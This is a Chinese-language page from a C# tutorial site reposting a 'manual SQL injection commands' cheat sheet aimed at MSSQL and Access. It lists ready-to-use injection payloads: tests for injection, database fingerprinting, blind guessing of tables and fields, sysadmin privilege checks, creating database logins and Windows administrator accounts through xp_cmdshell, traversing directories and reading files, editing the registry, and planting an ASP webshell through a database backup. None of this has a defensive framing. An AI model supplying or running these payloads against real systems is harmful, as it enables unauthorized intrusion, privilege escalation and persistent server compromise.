设为首页
加入收藏
联系我们
首页 基础教程 技术文档 实例分析 数 据 库 疑难杂症 ASP.NET 七夕许愿树 技术论坛
同学网,基于同学关系的真实社区
<%-- 最新动态 Begin --%> <%-- 最新动态 End --%>
最新文章
 C#摄像头编程实例
 C#下用P2P技术实现点…
 Asp.net(c#)数…
 SQL Server数据…
 .NET牛人应该知道些什…
 NET牛人应该知道些什么
 SQL Server S…
 备份指定表到另一数据库
 SQLSERVER中快速…
 ASP.NET中url传…
 ASP.NET自动给UR…
 ASP.NET 2.0防…
 ASP.NET 2.0 …
 如何解决ASP.net中…
 sql server 与…
<%-- 最新动态 Begin --%> <%-- 最新动态 End --%>
推荐文章
 关于C#中的REF和黓认…
 读书笔记c#高级编程 委…
 【算法】C#快速排序类
 Visual C#的SQ…
 C#中调用API
 Infragistics…
 C#接口转换
 C#读取设备信息
 用.net操作word
 C# MessageBo…
 Visual C#中的数…
 雅虎公司C#笔试题,看看…
 C#.NET使用NHib…
 .net学习之运算符重载…
 Visual C# 3.…
<%-- 最新动态 Begin --%> <%-- 最新动态 End --%>
热门文章
 ADO.Net与ADO在…
 开发ASP.NET下的M…
 用C#+XMI技术进行U…
 什么是虚拟机?
 C#基础全接触
 C#学习第一天
 雅虎公司C#笔试题,看看…
 C#语言初级入门(1)
 C#中利用正则表达式实现…
 远程重启计算机(C#)
 用.net操作word
 什么是B/S三层?
 VB和C# 语法对比图 …
 Visual C#常用函…
 Visual C#的SQ…
手动方式SQL注入脚本命令之精华版
阅读正文 文字大小:增大 减小  文字行距:增大 减小   双击自动滚屏
本文由中国C#技术学习中心整理  如果你对本文有不明之处请到技术论坛讨论!

        1.判断是否有注入;and 1=1 ;and 1=2

  2.初步判断是否是mssql ;and user>0

  3.注入参数是字符'and [查询条件] and ''='

  4.搜索时没过滤参数的'and [查询条件] and '%25'='

  5.判断数据库系统

  ;and (select count(*) from sysobjects)>0 mssql

  ;and (select count(*) from msysobjects)>0 access

  6.猜数据库 ;and (select Count(*) from [数据库名])>0

  7.猜字段 ;and (select Count(字段名) from 数据库名)>0

  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

  9.(1)猜字段的ascii(access)

  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

  (2)猜字段的ascii(mssql)

  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

  10.测试权限结构(mssql)

 

  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

  ;and 1=(select IS_MEMBER('db_owner'));--

  11.添加mssql和系统的帐户

  ;exec master.dbo.sp_addlogin username;--

  ;exec master.dbo.sp_password null,username,password;--

  ;exec master.dbo.sp_addsrvrolemember sysadmin username;--

  ;exec master.dbo.xp_cmdshell 'net user username password

  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--

  ;exec master.dbo.xp_cmdshell 'net user username password /add';--

  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

  12.(1)遍历目录

  ;create table dirs(paths varchar(100), id int)

  ;insert dirs exec master.dbo.xp_dirtree 'c:\'

  ;and (select top 1 paths from dirs)>0

  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)

  (2)遍历目录

  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表

  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构

  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容

  13.mssql中的存储过程

  xp_regenumvalues 注册表根键, 子键

  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值

  xp_regread 根键,子键,键值名

  ;exec xp_regread

  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值

  xp_regwrite 根键,子键, 值名, 值类型,

  值类型有2REG_SZ 表示字符型,REG_DWORD 表示整型

  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表

  xp_regdeletevalue 根键,子键,值名

  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值

  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值

  14.mssqlbackup创建webshell

  use model

  create table cmd(str image);

  insert into cmd(str) values ('');

  backup database model to disk='c:\l.asp';

  15.mssql内置函数

  ;and (select @@version)>0 获得Windows的版本号

  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa

  ;and (select user_name())>0 爆当前系统的连接用户

  ;and (select db_name())>0 得到当前连接的数据库

  16.简洁的webshell

  use model

  create table cmd(str image);

  insert into cmd(str) values ('');

  backup database model to disk='g:\wwwtest\l.asp';



本文由中国C#技术学习中心整理  如果你对本文有不明之处请到技术论坛讨论!

中国C#技术交流QQ群:6337034  10976424  9383681  35248582  35248645
版权所有:中国C#技术学习中心 Copyright ? 2006-2008
建议浏览分辨率使用:1024*768分辨率
粤ICP备05002251号